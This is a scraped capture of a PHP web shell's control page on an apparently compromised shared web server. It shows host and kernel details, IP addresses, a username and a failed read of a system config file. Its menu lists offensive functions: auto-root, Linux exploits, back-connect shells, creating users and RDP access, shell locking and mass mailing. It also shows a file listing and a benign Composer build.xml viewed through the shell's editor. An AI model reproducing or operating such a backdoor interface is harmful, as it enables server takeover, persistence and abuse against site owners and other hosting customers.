Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
sebastian /
environment /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.travis.yml
200
B
-rw-r--r--
LICENSE
1.51
KB
-rw-r--r--
README.md
2.02
KB
-rw-r--r--
build.xml
812
B
-rw-r--r--
composer.json
713
B
-rw-r--r--
phpunit.xml
742
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : build.xml
<?xml version="1.0" encoding="UTF-8"?> <project name="environment"> <target name="clean" description="Cleanup build artifacts"> <delete dir="${basedir}/vendor"/> <delete file="${basedir}/composer.lock"/> </target> <target name="composer" depends="clean" description="Install dependencies with Composer"> <tstamp> <format property="thirty.days.ago" pattern="MM/dd/yyyy hh:mm aa" offset="-30" unit="day"/> </tstamp> <delete> <fileset dir="${basedir}"> <include name="composer.phar" /> <date datetime="${thirty.days.ago}" when="before"/> </fileset> </delete> <get src="https://getcomposer.org/composer.phar" dest="${basedir}/composer.phar" skipexisting="true"/> <exec executable="php"> <arg value="composer.phar"/> <arg value="install"/> </exec> </target> </project>
Close